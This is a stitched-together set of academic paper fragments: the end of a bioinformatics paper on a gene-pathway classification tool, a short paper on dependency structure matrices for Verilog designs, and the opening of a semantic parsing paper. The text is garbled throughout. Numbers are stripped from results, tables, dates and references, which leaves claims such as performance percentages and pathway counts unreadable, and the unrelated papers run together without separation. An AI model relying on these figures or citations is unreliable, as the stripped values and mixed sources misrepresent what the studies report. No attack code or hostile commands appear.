. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . avg . . . . . . . . . . . . . 
(table , continued: #g rows and the cognet_rf panel, giving the auc values per gds data set and the average number of genes at each level.) for each tool other than svm-rce, we have obtained the performance over the top – groups that were ranked by the scoring stage. for svm-rce we obtained the performance starting with , genes and clusters, then reduced by % at each iteration. for comparison purposes, we consider the last clusters. table presents in detail all the results obtained by applying the cognet_rf tool. the auc measure is presented. the #g columns give the average number of genes over the iterations of the cross-validation. figure presents the average of all auc results over the datasets on the clusters/groups for each tool (avg auc bar), while the avg#genes bar represents the average number of genes over the datasets on the clusters/groups. the results presented in tables a– c and fig. indicate that on average cognet outperforms mate by % while obtaining results similar to svm-rce. considering the number of genes, svm-rce uses folds more genes than cognet. an additional observation is that both svm-rce and mate failed to reach reasonable results on the data set gds , while cognet reached a performance of about – %. figure the average of the results for the three tools. the upper part is the performance auc measurement while the lower part is the number of genes (#g). full-size doi: . /peerj-cs.
/fig- table (continued) #clusters/ #groups cognet_rf gds gds gds gds gds gds gds gds _ gds gds gds gds gds auc auc auc auc auc auc auc auc auc auc auc auc auc yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds https://www.ncbi.nlm.nih.gov/sites/gdsbrowser?acc=gds http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table association of the top pathways with the disease under study. “dataset” indicates the dataset geo id. dataset investigated disease id pathway literature support pmid gse rheumatoid arthritis hsa non-alcoholic fatty liver disease (nafld) none none gse rheumatoid arthritis hsa ubiquitin mediated proteolysis aberration of this system leads to the dysregulation of cellular homeostasis and the development of multiple inflammatory and autoimmune diseases, including rheumatoid arthritis. gse rheumatoid arthritis hsa huntington disease none none gse rheumatoid arthritis hsa thermogenesis none none gse rheumatoid arthritis hsa retrograde endocannabinoid signaling endocannabinoids, a group of endogenous bioactive lipids, have immunomodulatory effects able to influence both inflammation and pain in rheumatic disease, including rheumatoid arthritis. , gse rheumatoid arthritis hsa alzheimer disease none none gse rheumatoid arthritis hsa autophagy deregulation of autophagic pathway has recently been implicated in the pathogenesis of several autoimmune diseases, including rheumatoid arthritis. gse rheumatoid arthritis hsa nod-like receptor signaling pathway nod-like receptors are being implicated in the pathology of ra and other rheumatic diseases. gse rheumatoid arthritis hsa parkinson disease none none gse rheumatoid arthritis hsa viral carcinogenesis none none gse colorectal cancer hsa estrogen signaling pathway none none gse colorectal cancer hsa b cell receptor signaling pathway none none gse colorectal cancer hsa erbb signaling pathway erbb pathway may have a role in both normal colon epithelial cell differentiation and malignant transformation. gse colorectal cancer hsa leishmaniasis none none gse colorectal cancer hsa breast cancer none none gse colorectal cancer hsa focal adhesion cancer cells exhibit highly altered focal adhesion dynamics. gse colorectal cancer hsa apoptosis abnormalities in apoptotic function contribute to both the pathogenesis of colorectal cancer and its resistance to chemotherapeutic drugs and radiotherapy. gse colorectal cancer hsa mapk signaling pathway mapk signaling plays an important part in progression of colorectal cancer. gse colorectal cancer hsa human t-cell leukemia virus infection none none gse colorectal cancer hsa pathways in cancer "meta"-pathway of cancer pathways. none gse prostate cancer hsa cell cycle dysregulation of the cell cycle is implicated in the biology of many cancers, including pca. , , (continued) yousef et al. ( ), peerj comput. 
sci., doi . /peerj-cs. / http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ validation of the results we have conducted further analysis using the datasets (gse , gse and gse ) that was considered in the pathfindr study. gse consists of samples corresponding to rheumatoid arthritis (ra) patients and controls. the aim of this study is to identify peripheral blood gene expression profiles for ra patients. the study considers the standard statistical approaches in order to detect the significant genes by anova with false discovery rate (fdr < %). the gene ontology (go) in the panther database is applied to identify biological processes. gse consists of colonic mucosa of healthy control samples and patient samples. patients and controls were age- ( or less), ethnicity- (chinese) and tissue- matched. the analysis to detect significant genes was based on t-test, hierarchical clustering, mean fold-change and principal component. gse consists of prostate cancer samples and normal. the aim of the study is to compare the expression levels between malignant and benign prostate tissues. we have run the cognet tool on those three datasets obtaining the performance on top significant pathways. the auc values are presented in table . association of the top pathways with the disease under study for each dataset, the top groups (pathways) identified by cognet were manually examined in the literature for a possible association with the disease table (continued) dataset investigated disease id pathway literature support pmid gse prostate cancer hsa axon guidance none none gse prostate cancer hsa hippo signaling pathway the hippo pathway effector yap regulates motility, invasion, and castration-resistant growth of prostate cancer cells. gse prostate cancer hsa human t-cell leukemia virus infection none none gse prostate cancer hsa ras signaling pathway ras signaling plays an important role in prostate cancer progression and is a possibly mediator of hormone resistance. , gse prostate cancer hsa biosynthesis of unsaturated fatty acids alterations in lipid metabolism, and specifically the uptake and synthesis of fatty acids (fas), comprise a well-documented aspect of metabolic reprograming in cancer. 
gse prostate cancer hsa human cytomegalovirus infection none none gse prostate cancer hsa tgf-beta signaling pathway tgf-beta signaling has pivotal roles in tumorigenesis and tumor progression , gse prostate cancer hsa mapk signaling pathway mapk signaling pathways act through their effects on apoptosis, survival, metastatic potential, and androgen-independent growth in prostate cancer gse prostate cancer hsa age-rage signaling pathway in diabetic complications none none note: “investigated disease” indicates the disease investigated by the study. “id” and “pathway” indicate the kegg id and pathway name of the top pathway, respectively. “literature support” provides a brief summary of literature support for the pathway-disease association. “pmid” indicates the pubmed id(s) of the supporting study/ studies. yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ under study. literature support for the top pathways per each dataset are presented in table . for gse , the rheumatoid arthritis dataset, out the top pathways were found to be supported by literature to be associated with rheumatoid arthritis biology. for gse , comparing colorectal cancer patients to healthy controls, out of the top pathways were supported by literature to be associated with colorectal cancer. finally, for gse , the dataset comparing human prostate benign and malignant tissue, out of the top pathways were found to be associated with prostate cancer. the cognet results highlighted several new pathways that could contribute to the identification of innovative clinical biomarkers for diagnostic procedures and therapeutic intervention. discussion and conclusions we have presented a novel tool called cognet that is based on ranking and classification and integration of biological knowledge. cognet is developed on top of the tool pathfindr to add to its functionality the ability to perform classification using the enriched kegg pathways as features. cognet outputs to the user the performance and a list of significant kegg pathways that we believe will contribute to a better and deep understanding of the data under investigation. there is similarity between cognet and mate in that both rank a group of genes for classification tasks. however, cognet is using the biological information of the kegg pathways that was processed by an enrichment procedure to suggest a list of significant pathways, then cognet ranks those pathways in terms of their contribution for separating the two-class of the given data (classification task). however, mate uses prior information about microrna and its target genes to group the genes. 
this grouping is not related to the expression of the genes as cognet is considering. moreover, svm-rce is using the clustering algorithm k-means in order to group the genes into clusters, that means that groups are related to the expression of the genes. as a future work, we would develop cognet to explore the effectiveness of different combinations of the kegg pathways in the data, that means instead of ranking each pathway’s genes individually, we will use a different approach to rank those groups simultaneously. in the current version, cognet ranks each kegg pathway individually by performing internal cross validation. additionally, we are working to integrate cognet and mate where the process of the rank will be applied on the groups generated by the biological functions used in each tool. as a result, the discovery of the significant pathways and microrna targets genes will suggest to the biology researcher to explore the role of pathways and microrna together in the same data. the success of cognet, mate and svm-rce is suggesting that more computational approaches need to be developed based on the merit of integration of biological information into the machine learning algorithm. yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � malik yousef conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � ege Ülgen conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � osman uğur sezerman conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data is available at ncbi geo: gds , gds , gds , gds , gds , gds , gds , gds , gds , gds , gds , gds , gse , gds , gse , gds , gse , gds . the code is available at github: https://github.com/malikyousef/mircorrnet. the doi of the tool is available at zenodo: malikyousef. ( , november ). malikyousef/mircorrnet: mircorrnet (version v . ). zenodo. doi . /zenodo. . references acharya s, saha s, nikhil n. . unsupervised gene selection using biological knowledge: application in sample clustering. bmc bioinformatics ( ): doi . /s - - - . ashburner m, ball ca, blake ja, botstein d, butler h, cherry jm, davis ap, dolinski k, dwight ss, eppig jt, harris ma, hill dp, issel-tarver l, kasarskis a, lewis s, matese jc, richardson je, ringwald m, rubin gm, sherlock g. . gene ontology: tool for the unification of biology. nature genetics ( ): – doi . / . bellazzi r, zupan b. . towards knowledge-based gene expression data mining. journal of biomedical informatics ( ): – doi . /j.jbi. . . . berthold mr, cebron n, dill f, gabriel tr, kötter t, meinl t, ohl p, thiel k, wiswedel b. . knime: the konstanz information miner: version . 
and beyond. acm sigkdd explorations newsletter ( ): – doi . / . . yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/nuccore/gds http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://www.ncbi.nlm.nih.gov/nuccore/gds https://dx.doi.org/ . /zenodo. https://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /j.jbi. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bradley ap. . the use of the area under the roc curve in the evaluation of machine learning algorithms. pattern recognition ( ): – doi . /s - ( ) - . clough e, barrett t. . the gene expression omnibus database. methods in molecular biology ( ): – doi . / - - - - _ . cohn-alperovich d, rabner a, kifer i, mandel-gutfreund y, yakhini z. . mutual enrichment in aggregated ranked lists with applications to gene expression regulation. bioinformatics ( ):i –i doi . /bioinformatics/btw . deshpande g, li z, santhanam p, coles cd, lynch me, hamann s, hu x. . recursive cluster elimination based support vector machine for disease state prediction using resting state functional and effective brain connectivity. plos one ( ):e doi . /journal.pone. . fang oh, mustapha n, sulaiman mn. . an integrative gene selection with association analysis for microarray data classification. intelligent data analysis ( ): – doi . /ida- . harris d, niekerk av. . feature clustering and ranking for selecting stable features from high dimensional remotely sensed data. international journal of remote sensing ( ): – doi . / . . . inza i, larrañaga p, blanco r, cerrolaza aj. . filter versus wrapper gene selection approaches in dna microarray domains. artificial intelligence in medicine ( ): – doi . /j.artmed. . . . johannes m, brase jc, fröhlich h, gade s, gehrmann m, fälth m, sültmann h, beissbarth t. . integration of pathway knowledge into a reweighted recursive feature elimination approach for risk stratification of cancer patients. bioinformatics ( ): – doi . /bioinformatics/btq . lazar c, taminau j, meganck s, steenhoff d, coletta a, molter c, de schaetzen v, duque r, bersini h, nowé a. . a survey on filter techniques for feature selection in gene expression microarray analysis. ieee/acm transactions on computational biology and bioinformatics ( ): – doi . /tcbb. . . lazzarini n, bacardit j. . rgife: a ranked guided iterative feature elimination heuristic for the identification of biomarkers. bmc bioinformatics ( ): doi . /s - - - . nacu s, critchley-thorne r, lee p, holmes s. . gene expression network analysis and applications to immunology. bioinformatics ( ): – doi . /bioinformatics/btm . pan w. . a comparative review of statistical methods for discovering differentially expressed genes in replicated microarray experiments. bioinformatics ( ): – doi . /bioinformatics/ . . . papachristoudis g, diplaris s, mitkas pa. 
. sofocles: feature filtering for microarray classification based on gene ontology. journal of biomedical informatics ( ): – doi . /j.jbi. . . . perscheid c, grasnick b, uflacker m. . integrative gene selection on gene expression data: providing biological context to traditional approaches. journal of integrative bioinformatics ( ): doi . /jib- - . piñero j, ramírez-anguita jm, saüch-pitarch j, ronzano f, centeno e, sanz f, furlong li. . the disgenet knowledge platform for disease genomics: update. nucleic acids research :gkz doi . /nar/gkz . yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /ida- http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.artmed. . . http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /tcbb. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . /j.jbi. . . http://dx.doi.org/ . /jib- - http://dx.doi.org/ . /nar/gkz http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ qi j, tang j. . integrating gene ontology into discriminative powers of genes for feature selection in microarray data. in: proceedings of the acm symposium on applied computing—sac ’ , seoul, korea, . quanz b, park m, huan j. . biological pathways as features for microarray data classification. in: proceeding of the nd international workshop on data and text mining in bioinformatics— dtmbio ’ . napa valley, california, usa, . raghu vk, ge x, chrysanthis pk, benos pv. . integrated theory-and data-driven feature selection in gene expression data analysis. in: ieee rd international conference on data engineering (icde). san diego, ca, usa, – . ulgen e, ozisik o, sezerman ou. . pathfindr: an r package for comprehensive identification of enriched pathways in omics data through active subnetworks. frontiers in genetics : doi . /fgene. . . van ’t veer lj, dai h, van de vijver mj, he yd, hart aam, mao m, peterse hl, van der kooy k, marton mj, witteveen at, schreiber gj, kerkhoven rm, roberts c, linsley ps, bernards r, friend sh. . gene expression profiling predicts clinical outcome of breast cancer. nature ( ): – doi . / a. vanjimalar s, ramyachitra d, manikandan p. . a review on feature selection techniques for gene expression data. in: ieee international conference on computational intelligence and computing research (iccic). – . yousef m, abdallah l, allmer j. . mate: discovering expressed interactions between micrornas and their targets. bioinformatics ( ): – doi . /bioinformatics/btz . yousef m, jung s, showe l, showe m. . recursive cluster elimination (rce) for classification and feature selection from gene expression data. bmc bioinformatics ( ): doi . / - - - . yousef m, ketany m, manevitz l, showe lc, showe mk. . classification and biomarker identification using gene network modules and support vector machines. bmc bioinformatics ( ): doi . / - - - . zhao x, wang l, chen g. . joint covariate detection on expression profiles for identifying micrornas related to venous metastasis in hepatocellular carcinoma. scientific reports ( ): doi . /s - - - . zycinski g, barla a, squillario m, sanavia t, camillo bdi, verri a. . knowledge driven variable selection (kdvs)—a new approach to enrichment analysis of gene signatures obtained from high–throughput data. source code for biology and medicine ( ): doi . / - - - . yousef et al. 
international journal of advanced network monitoring and controls volume , no.
, dsm modelling for digital design using verilog hdl xing xue , yao chen , and junchao wei faculty of economics and management, shangluo university, shangluo, china, chenyao @gmail.com electronic information and electrical engineering college, shangluo university, shangluo, china, @ qq.com school of mechanical engineering, northwestern polytechnical university, xi’an , china, weijunchao@mail.nwpu.edu.cn abstract. in the practice of product design, the efficient control of complexity has increasingly gained importance. the dependency structure matrix (dsm) has proved to be a useful tool for analysing system structure and managing structural complexity. in order to provide a deep insight of system structure in designing verilog hdl source code artefacts for digital system designers and project managers, the paper proposes a dsm modelling method based on the characteristics of the digital system structural modelling with verilog and the component dependencies relationship. a dsm modelling example is presented. result shows that with the dsm model, the source code artefacts can be efficiently analyzed. keywords: design structure matrix, modeling, verilog hdl, digital design . introduction verilog-hdl can be used to model and design a digital system in a form of software programming. how to manage the complexity of source code artefacts is an issue for digital designers. structural considerations are an established approach to manage complexity [ , ]. a digital system can be decomposed into many sub-systems or modules. relationships between these modules exist. so system analysis is needed. the dsm[ , ] is a square matrix to identify the dependencies or relationships between components of a system. components of a system can be parts in a product, tasks of a project, and departments within an organization to be modelled. an n×n dsm has n elements with identical row and column labels and each entry of the dsm represents a particular kind of relationship, such as information flow, force flow, and so on. in the example dsm in fig. , elements are represented by the shaded elements along the diagonal. an off-diagonal mark signifies the dependency of one element on another. if element clk sends information to or influences the behaviour of element m , then the (row clk, columnm ) entry of the dsm contains a mark. of course, we can also use the binary relations and to represent the relationships between dsm elements. furthermore, other numerical values can present more detailed information, international journal of advanced network monitoring and controls volume , no. , such as the assessment of importance, rework probabilities, impact of changes, probability of changes, etc.[ ]. when a dsm is modelled, it is usually analyzed with clustering algorithms or other algorithms. through dsms, valuable insights from the system structure can be derived after examining the interactions within and among the subsystems. the dsm has been used in many fields, including the software field [ - ]; however, no paper is found to use dependency structure matrices (dsms) for digital design using verilog. this paper attempts to introduce the dsm to this field. the focus of the paper is how to model dsms for verilog hdl programs from a structural viewpoint without considering technical constraints. a simple analysis of system structure using dsms is illustrated. the rest of this paper is structured as follows. section reviews digital design using verilog. section sets up some rules to model the dsm. 
section presents an example model. finally, the paper proposes a conclusion. figure. example dsm . structural modelling using verilog hdl digital circuits are composed of interconnected components, such as logic gates and triggers. in most cases of the digital designs, models are used to express the digital circuits and the design work is done using cad tools. the design using verilog hdl embodies hierarchical and modular methodology. at every level of a hierarchical design, the efforts focus on the related level, and details of lower hierarchical levels are hidden, thus facilitating the complex design. this methodology helps to reuse the available modules or purchase ip modules. furthermore, this hierarchical composition makes functional verification easier. a structural model is composed of kinds of object instances [ ]: ) built-in primitives(and, or, xor, etc); ) user defined primitives (udp, such as mux ); and ) designed modules. instantiation refers to the formation of a high-level verilog module by connecting low-level logic primitives or modules. the instantiated object is called as instance. the structural modelling process is done using instantiation. a module is a basic unit in verilog hdl. it describes the function of a logic entity. the function of a module can be described separately, or through other instances of other modules. that is, a structural dsm modelling for digital design using verilog hdl module can include behaviour statements (such as always), continuous assignment statements (assign), build-in primitives, udps and other modules, or a combination of these objects. in this sense, a module describes a structure and behaviour of a hardware block in the form of software. a module includes ports as interfaces to exchange information with external environment. from a systematic and structural viewpoint, ports of a module can stand for this module. . dsm modelling for digital designs using verilog for a digital system design using verilog, the source code is a kind of design artefacts. components of this artefact can be module instances described above or other objects of interest, such as reg variables, wire variables, or always blocks. these components can be considered as elements of a dsm and relationships between these elements are defined by signal interaction or logical dependency. the dsm modelling procedure consists of three major steps: step : choose components of digital system according to the hierarchy level. step : represent these components in a dsm. for a verilog module instance, its port signal set stands for the module itself as a “macro” dsm element; for a block, a set of variables interacting with the outside of the block represent the block itself as a dsm element; a variable can be directly placed in the dsm. step : build up relationships between these elements in the dsm. these relationships depend on interface signal interactions or logical dependencies.for example, a variable on the left-hand side of an assignment statement depends on variables on the right-hand side. . example fig. shows a portion of fpga-based functions of a certain control card. 
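before walking through the example below, the three-step procedure above can be illustrated with a short sketch. the code is not part of the paper's tooling; the element names and dependency pairs are hypothetical placeholders of the kind discussed above (clock and reset nets, module instances, an always block), and a plain numpy matrix stands in for the square dsm.

```python
# minimal sketch of the three-step dsm procedure (hypothetical elements).
# step 1: choose the components; step 2: give each a row/column;
# step 3: mark dependencies (row element influences column element,
# following the convention described for the example dsm).
import numpy as np

elements = ["clk", "reset", "m1", "m2", "fsm", "reset_n"]   # hypothetical component set
idx = {name: i for i, name in enumerate(elements)}
dsm = np.zeros((len(elements), len(elements)), dtype=int)

def add_dependency(source, target):
    # `target` depends on (receives a signal from) `source`
    dsm[idx[source], idx[target]] = 1

# hypothetical dependencies of the kind listed in step 3
add_dependency("clk", "m1")
add_dependency("clk", "fsm")
add_dependency("reset", "fsm")
add_dependency("reset", "reset_n")   # e.g., assign reset_n = !reset;
add_dependency("m1", "m2")           # m2 consumes a signal produced by m1

# simple degree analysis: elements with high out-degree influence many others
out_degree = dsm.sum(axis=1)
in_degree = dsm.sum(axis=0)
for name in elements:
    print(f"{name}: out={out_degree[idx[name]]}, in={in_degree[idx[name]]}")
```

out-degree here counts how many other elements a given element influences, which is the simple degree analysis applied to the worked example that follows.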
there are several instantiated modules: ) sdac m (.startdac(startsdac), .dac_addr(sdac_addr), .dac_data(sdac_data), .dac_ clk(clk_ m), .dac_sck(sdac_sclk), .dac_sdo(sdac_sdo), .dac_csn(sdac_cs) ); // serial dac module ) m_pwm m (.clk(clk),.pwm_en(pwm_en),.count (count ), .count (count ),.q_pwm(pwm) ); // pwm module ) generator m m .clkin(clk), .clkout(clk_ m), .reset(reset) ); and there is a finite state machine as a block: always @(negedgeclkor posedgereset ) begin …… end international journal of advanced network monitoring and controls volume , no. , in addition, there is an assignment statement about nets reset_n and reset: assign reset_n = !reset; figure. system composition and module dependency in the example these three instantiated modules, the finite state machine block and variables reset_n and reset are chosen as elements for dsm elements. the dsm for these digital system can be obtained, as shown in fig. . from this model, it is shown that the net reset_n depends on the net reset. the behaviour of the finite state machine is dependent on the net clk and reset. all these relationships between elements are obviously signified by marks. if a condensed model is needed, interface signals for modules or the block can be hidden and only element names and relationships between these elements are preserved (see fig. ). however, many details are lost in this condensed version. a simple analysis of artefact architecture is degree analysis of elements [ ]. for example, clk and reset have high out-degrees, so these two elements have more impacts on others while m and m have no impact on others. figure. dsm modeling for the system in fig. dsm modelling for digital design using verilog hdl . conclusion dsms can reveal the relationships between components in a system in a concise way and provide designers with insight into the system. this paper set up some rules about building up dsms for digital design usingverilog-hdl. with the dsm model, the source code artefacts can be efficiently analyzed. references [ ] lindemann u., maurer m. & braun t., structural complexity management - an approach for the field of product design.berlin :springer, . [ ] biedermann,w.&lindemann,u., on the applicability of structural criteria in complexity management. th international conference on engineering design, iced , copenhagen, denmark, pp. - , . [ ] steward,d. v., the design structure system: a method for managing the design of complex systems. ieee transactions on engineering management, ( ).pp. – , . [ ]browning,t.r., applyingthedesignstructurematrixtosystemdecompositionandintegrationproblems:a reviewandnewdirections. ieeetransactionsonengineeringmanagement, ( ),pp. – , . [ ] lee, w.-t.,hsu, k.-h.&lee, j., designing software architecture with use case blocks using the design structure matrix, international symposium on computer, consumer and control,taichung, taiwan.pp. - , . [ ]sangal, n., jordan, e., sinha, v. &jackson, d.,using dependency models to manage complex software architecture. th annual acm conference on object-oriented programming, systems, languages, and applications, san diego, ca, united states. pp. - , . [ ]sosa, m. e., browning, t.&mihm, j., studying the dynamics of the architecture of software products. proceedings of the asme international design engineering technical conferences and computers and information in engineering conference, las vegas, nv, united states.pp. - , . [ ]lamantia, m. 
j.,cai, y.,maccormack,a.d.&rusnak, j.,analyzing the evolution of large-scale software systems using design structure matrices and design rule theory, th ieee/ifip working conference on software architecture, wicsa , vancouver, bc, canada .pp. - , . [ ]mirson, a.,skrypnyuk, o.,elezi, f.&lindemann, u.,mdm-based software modularization by analysing inter-project dependencies, th international dependency and structure modelling conference, cambridge, ma, united states.pp. - , . [ ] ashenden,p. j. ,digital design: an embedded systems approach using verilog. morgan kaufmann publishers, . [ ] cavanagh, j., verilog hdl: digital design and modelling.crc press, . [ ] sosa, m. e., eppinger, s. d., and rowles, c. m., , “a network approach to define modularity of components in complex products,” asme j. mech. des., ( ), pp. – . international journal of advanced network monitoring and controls volume , no. , author brief and sponsors xing xue, she received master degree in school of management from xi’an university of architecture and technology, xi’an, china, in . now she works at shangluo university. her current research interests include information management and information process. this work was supported by natural science foundation of shangluo city of shaanxi province of china and shangluo university (project no.sk - - , sk - - ) large-scale semantic parsing without question-answer pairs siva reddy, mirella lapata, mark steedman school of informatics, university of edinburgh crichton street, edinburgh eh ab siva.reddy@ed.ac.uk, mlap@inf.ed.ac.uk, steedman@inf.ed.ac.uk abstract in this paper we introduce a novel semantic parsing approach to query freebase in natu- ral language without requiring manual anno- tations or question-answer pairs. our key in- sight is to represent natural language via se- mantic graphs whose topology shares many commonalities with freebase. given this rep- resentation, we conceptualize semantic pars- ing as a graph matching problem. our model converts sentences to semantic graphs using ccg and subsequently grounds them to free- base guided by denotations as a form of weak supervision. evaluation experiments on a sub- set of the free and webquestions benchmark datasets show our semantic parser improves over the state of the art. introduction querying a database to retrieve an answer, telling a robot to perform an action, or teaching a com- puter to play a game are tasks requiring communi- cation with machines in a language interpretable by them. semantic parsing addresses the specific task of learning to map natural language (nl) to machine interpretable formal meaning representations. tra- ditionally, sentences are converted into logical form grounded in the symbols of some fixed ontology or relational database. approaches for learning semantic parsers have been for the most part supervised, using annotated training data consisting of sentences and their cor- responding logical forms (zelle and mooney, ; zettlemoyer and collins, ; wong and mooney, ; kwiatkowski et al., ). more recently, al- ternative forms of supervision have been proposed to alleviate the annotation burden, e.g., by learn- ing from conversational logs (artzi and zettlemoyer, ), from sentences paired with system behav- ior (chen and mooney, ; goldwasser and roth, question what is the capital of texas? logical form λx. city(x)∧capital(x,texas) answer {austin} figure : an example question with annotated logi- cal query, and its answer. 
; artzi and zettlemoyer, ), via distant su- pervision (krishnamurthy and mitchell, ; cai and yates, ), from questions (goldwasser et al., ; poon, ; fader et al., ), and question- answer pairs (clarke et al., ; liang et al., ). indeed, methods which learn from question-answer pairs have been gaining momentum as a means of scaling semantic parsers to large, open-domain problems (kwiatkowski et al., ; berant et al., ; berant and liang, ; yao and van durme, ). figure shows an example of a question, its annotated logical form, and answer (or denotation). in this paper, we build a semantic parser that does not require example annotations or question-answer pairs but instead learns from a large knowledge base (kb) and web-scale cor- pora. specifically, we exploit freebase, a large community-authored knowledge base that spans many sub-domains and stores real world facts in graphical format, and parsed sentences from a large corpus. we formulate semantic parsing as a graph matching problem. we convert the output of an open-domain combinatory categorial gram- mar (ccg) parser (clark and curran, ) into a graphical representation and subsequently map it onto freebase. the parser’s graphs (also called un- grounded graphs) are mapped to all possible free- base subgraphs (also called grounded graphs) by re- placing edges and nodes with relations and types in freebase. each grounded graph corresponds to a unique grounded logical query. during learning, our semantic parser is trained to identify which kb sub- graph best corresponds to the nl graph. problem- capital(austin)∧unique(austin)∧capital.of.arg (e,austin)∧capital.of.arg (e,texas) (a) semantic parse of the sentence austin is the capital of texas. capital capital unique austin e texas ty p e capital. of.arg capital. of.arg unique(austin) ∧ capital(austin)∧ capital.of.arg (e, austin) ∧ capital.of.arg (e, texas) (b) ungrounded graph for semantic parse (a); unique means that austin is the only capital of texas. capital capital target x e texas ty p e capital. of.arg capital. of.arg target(x) ∧ capital(x) 